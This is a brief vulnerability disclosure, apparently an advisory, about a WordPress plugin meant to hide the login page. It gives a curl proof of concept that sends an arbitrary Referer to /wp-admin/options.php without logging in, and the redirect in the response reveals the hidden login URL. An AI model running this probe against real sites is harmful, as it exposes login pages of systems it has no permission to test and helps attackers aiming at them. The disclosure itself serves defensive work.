The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
curl --referer “something” -sIXGET https://example.com/wp-admin/options.php HTTP/2 302 … location: https://example.com/secret-login/?redirect_to=%2Fwp-admin%2Fsomething&reauth;=1